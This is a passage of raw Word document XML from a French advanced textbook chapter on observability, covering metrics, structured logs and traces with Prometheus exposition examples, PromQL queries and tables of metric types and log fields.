          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Comprendre ce que fait un système en production sans avoir à le deviner.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 30 · Niveau : Avancé · Prérequis : chapitre 82</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Distinguer surveillance et observabilité.</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Choisir le bon signal pour une question.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Instrumenter une application avec OpenTelemetry.</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Écrire une requête PromQL utile.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Réduire le bruit des alertes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>83.1 Trois signaux, trois questions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La surveillance répond à des questions connues d'avance. L'observabilité permet de répondre à des questions imprévues, à condition que le système émette assez d'information.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.317 — Trois signaux</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2253"/>
        <w:gridCol w:w="2253"/>
        <w:gridCol w:w="2253"/>
        <w:gridCol w:w="2253"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="202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Signal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="293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Répond à</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="169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Coût</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="236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Exemple</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2028"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Métrique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2930"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Combien, à quelle fréquence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1690"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2366"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Latence p95</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="202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Journal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="293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Que s'est-il passé exactement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="169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Élevé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="236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Erreur de validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2028"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Trace</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2930"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Où le temps a-t-il été passé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1690"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Moyen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2366"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Appel base lente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OBSERVABILITÉ</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Capacité à comprendre l'état interne d'un système à partir de ses signaux externes, sans modifier le code ni redéployer.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2921000"/>
            <wp:docPr id="96" name="Picture 96"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f94.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId134"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2921000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.94 — Choisir son signal</w:t>
      </w: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LES MÉTRIQUES SONT PEU COÛTEUSES, LES JOURNAUX NE LE SONT PAS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Une métrique est un agrégat périodique : quelques octets par série et par intervalle. Un journal est une ligne par événement : multiplié par le trafic, il devient la première source de coût d'observabilité.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>83.2 Métriques</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une métrique se nomme, se type et s'étiquette. Le choix des étiquettes est décisif : chaque combinaison distincte crée une série temporelle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.318 — Quatre types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35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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="365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Exemple</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2352"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Compteur</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Total cumulé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3658"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>http_requests_total</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="235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Jauge</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Valeur instantanée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3658"/>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connections_actives</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2352"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Histogramme</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Distribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3658"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>duration_seconds_bucket</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="235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Résumé</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Quantiles calculés</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3658"/>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duration_seconds{quantile}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une exposition saine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Exposition au format Prometheus</w:t>
        <w:br/>
        <w:t>http_requests_total{method="GET",route="/panier",status="200"} 10432</w:t>
        <w:br/>
        <w:t>http_request_duration_seconds_bucket{route="/panier",le="0.1"} 9810</w:t>
        <w:br/>
        <w:t>http_request_duration_seconds_bucket{route="/panier",le="0.5"} 10390</w:t>
        <w:br/>
        <w:t>http_request_duration_seconds_bucket{route="/panier",le="+Inf"} 10432</w:t>
        <w:br/>
        <w:br/>
        <w:t># Ne jamais mettre un identifiant unique en étiquette</w:t>
        <w:br/>
        <w:t># http_requests_total{user_id="84213"}  → explosion de séries</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L'EXPLOSION DE CARDINALITÉ</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Une étiquette dont le nombre de valeurs augmente avec le trafic (identifiant de commande, adresse IP, identifiant de session) multiplie les séries et peut faire tomber le serveur de métriques. Ces valeurs appartiennent aux journaux ou aux traces.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre requêtes · promql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Débit de requêtes par route</w:t>
        <w:br/>
        <w:t>sum by (route) (rate(http_requests_total[5m]))</w:t>
        <w:br/>
        <w:br/>
        <w:t># Taux d'erreur</w:t>
        <w:br/>
        <w:t>sum(rate(http_requests_total{status=~"5.."}[5m]))</w:t>
        <w:br/>
        <w:t xml:space="preserve">  / sum(rate(http_requests_total[5m]))</w:t>
        <w:br/>
        <w:br/>
        <w:t># Latence p95 (histogramme)</w:t>
        <w:br/>
        <w:t>histogram_quantile(0.95,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  sum by (le, route) (rate(http_request_duration_seconds_bucket[5m])))</w:t>
        <w:br/>
        <w:br/>
        <w:t># Requêtes les plus lentes</w:t>
        <w:br/>
        <w:t>topk(5, sum by (route) (rate(http_request_duration_seconds_sum[5m]))</w:t>
        <w:br/>
        <w:t xml:space="preserve">        / sum by (route) (rate(http_request_duration_seconds_count[5m])))</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QUANTILE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Valeur sous laquelle se situe une proportion donnée des observations. Le p95 est la valeur qui couvre 95 % des requêtes : il ignore les extrêmes, contrairement à la moyenne.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>83.3 Journaux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un journal exploitable est structuré, corrélé et filtrable. Une ligne de texte libre oblige à écrire des expressions régulières fragiles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une ligne structurée · json</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w:t>
        <w:br/>
        <w:t xml:space="preserve">  "ts": "2026-10-19T14:03:22.481Z",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "niveau": "erreur",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "service": "boutique",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "version": "1.4.2",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "trace_id": "4bf92f3577b34da6a3ce929d0e0e4736",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "span_id": "00f067aa0ba902b7",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "utilisateur": "u-9213",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "message": "paiement refusé",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "code": "CARTE_EXPIREE",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "duree_ms": 812</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.319 — Six champs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43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Champ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="386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27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Obligatoire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2432"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3863"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Horodatage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2719"/>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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="243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niveau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="386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Gravité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="27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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2432"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3863"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Origine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2719"/>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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="243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trace_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="386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Corrélation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="27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r>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2432"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>message</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
